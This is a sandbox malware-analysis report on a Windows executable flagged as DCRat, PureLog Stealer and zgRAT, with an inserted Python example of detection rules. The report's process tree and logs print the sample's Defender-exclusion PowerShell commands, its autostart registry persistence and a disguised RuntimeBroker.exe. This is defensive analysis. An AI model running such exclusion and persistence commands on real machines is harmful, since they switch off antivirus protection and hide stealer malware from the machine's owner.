
Windows Analysis Report
4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe

Overview

General Information

Sample name: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Analysis ID: 1510313
MD5: b8aa70ed9243f5aa9c8dd45e8b6c01e7
SHA1: 8d871a1d93cc069413563d42dad3f098f4ac5e5d
SHA256: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6cae0a25d742b650c62351
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
    • csc.exe (PID: 6148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7244 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7680 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7712 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7740 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7768 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7852 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7876 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7896 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7908 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7944 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7960 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7976 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7992 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8008 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8080 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8416 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 9148 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 1888 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • XrtbrRarCSNElLBNKqySVVhxSZIi.exe (PID: 1476 cmdline: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • XrtbrRarCSNElLBNKqySVVhxSZIi.exe (PID: 1792 cmdline: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • RuntimeBroker.exe (PID: 7548 cmdline: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • RuntimeBroker.exe (PID: 7612 cmdline: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe" MD5: B8AA70ED9243F5AA9C8DD45E8B6C01E7)
  • cleanup
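The process tree above is the detection surface a responder actually gets from Sysmon or an EDR: one parent spawning a burst of "powershell -Command Add-MpPreference -ExclusionPath" children (one per top-level directory of C:\, plus the drive root itself), csc.exe compiling from a .cmdline file in the user's Temp directory, a binary named RuntimeBroker.exe running from outside System32, and w32tm /stripchart under cmd.exe used as a sleep in the clean-up batch. The following is an added example (not part of the Joe Sandbox report) that encodes those four signals as rules over Sysmon Event ID 1 style records. The events are constructed from the command lines in the tree plus one benign control; the w32tm heuristic is my own, not a published Sigma rule.

```python
"""Process-creation rules for the behaviour shown in the tree above.

Added example, not part of the Joe Sandbox report. The events are
constructed from command lines in the process tree; field names follow
Sysmon Event ID 1 (Image, CommandLine, ParentImage) so the same rules can
be pointed at a real Sysmon or EDR export.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

SAMPLE = r"C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"


def ps_exclusion(path):
    """Command line of the Add-MpPreference children the sample spawns."""
    return f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{path}'"


# Constructed sample events; the last one is a benign control (the real RuntimeBroker).
EVENTS = [
    {"Image": CSC, "ParentImage": SAMPLE, "CommandLine":
     rf'"{CSC}" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"'},
    {"Image": PS, "ParentImage": SAMPLE, "CommandLine": ps_exclusion("C:/")},
    {"Image": PS, "ParentImage": SAMPLE, "CommandLine": ps_exclusion("C:/Users/")},
    {"Image": PS, "ParentImage": SAMPLE,
     "CommandLine": ps_exclusion(r"C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe")},
    {"Image": r"C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe", "ParentImage": "",
     "CommandLine": r'"C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"'},
    {"Image": r"C:\Windows\System32\w32tm.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"Image": r"C:\Windows\System32\RuntimeBroker.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\RuntimeBroker.exe -Embedding"},
]

EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+['\"]?([^'\"]+)", re.I)
DRIVE_ROOT_RE = re.compile(r"[a-z]:[\\/]?$", re.I)
# Windows binaries that only ever run from these directories on a healthy host.
SYSTEM_NAMES = {"runtimebroker.exe", "svchost.exe", "securityhealthsystray.exe", "conhost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SEVERITY = {"system_name_anomaly": "high", "dynamic_compile_from_temp": "medium", "w32tm_delay": "low"}


def _name(path):
    return PureWindowsPath(path).name.lower()


def _dir(path):
    return str(PureWindowsPath(path).parent).lower()


def classify(ev):
    """Return the (rule, detail) pairs that fire on a single process-creation event."""
    img, cmd, parent = ev["Image"], ev["CommandLine"], ev["ParentImage"]
    name, hits = _name(img), []
    if name == "powershell.exe":
        m = EXCLUSION_RE.search(cmd)
        if m:
            hits.append(("defender_exclusion", m.group(1).strip()))
    if name in SYSTEM_NAMES and not _dir(img).startswith(SYSTEM_DIRS):
        hits.append(("system_name_anomaly", img))
    if name == "csc.exe" and any(t in cmd.lower() for t in TEMP_MARKERS):
        hits.append(("dynamic_compile_from_temp", cmd))
    # Heuristic of my own, not a Sigma rule: w32tm /stripchart under cmd.exe is a batch-file sleep.
    if name == "w32tm.exe" and "/stripchart" in cmd.lower() and _name(parent) == "cmd.exe":
        hits.append(("w32tm_delay", cmd))
    return hits


def summarize(events):
    """Roll per-event hits up into (rule, severity, detail) findings.

    Exclusions are aggregated per parent: one process excluding a drive root,
    or adding three or more paths, blinds Defender to everything it drops next.
    """
    exclusions, findings = defaultdict(list), []
    for ev in events:
        for rule, detail in classify(ev):
            if rule == "defender_exclusion":
                exclusions[ev["ParentImage"]].append(detail)
            else:
                findings.append((rule, SEVERITY[rule], detail))
    for parent, paths in exclusions.items():
        root = any(DRIVE_ROOT_RE.match(p) for p in paths)
        sev = "high" if root or len(paths) >= 3 else "medium"
        findings.append(("defender_exclusion_burst", sev,
                         f"{_name(parent)} added {len(paths)} exclusion(s); drive root excluded: {root}"))
    return findings


if __name__ == "__main__":
    for rule, sev, detail in summarize(EVENTS):
        print(f"[{sev:>6}] {rule}: {detail}")
```

The per-parent aggregation is the part worth keeping: a single Add-MpPreference call is noisy in many environments, but one parent excluding C:\ (or a dozen directories in a row) is not, and on this host every later drop (C:\Recovery, C:\Windows\en-US, Program Files (x86)) lands inside an exclusion already in place.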
No configs have been found
Yara matches on the submitted sample
Source | Rule | Description | Author
4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches on dropped files
Source | Rule | Description | Author
C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

Yara matches on memory dumps
Source | Rule | Description | Author
00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Yara matches on unpacked PE files
Source | Rule | Description | Author
0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetFilename: C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", CommandLine: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, NewProcessName: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, OriginalFileName: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe", ProcessId: 7548, ProcessName: RuntimeBroker.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XrtbrRarCSNElLBNKqySVVhxSZIi
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ProcessId: 6148, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6148, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP", ProcessId: 6880, ProcessName: cvtres.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessId: 6700, TargetFilename: C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7680, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe", ParentImage: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ParentProcessId: 6700, ParentProcessName: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline", ProcessId: 6148, ProcessName: csc.exe
Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-12T20:17:48.215579+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49703 | 80.211.144.156 | 80 | TCP
2024-09-12T20:18:22.533210+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49710 | 34.117.59.81 | 443 | TCP


AV Detection

Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Avira: detected
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Avira: detection malicious, Label: TR/Spy.Agent.hwiyw
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | Avira: detection malicious, Label: TR/Spy.Agent.hwiyw
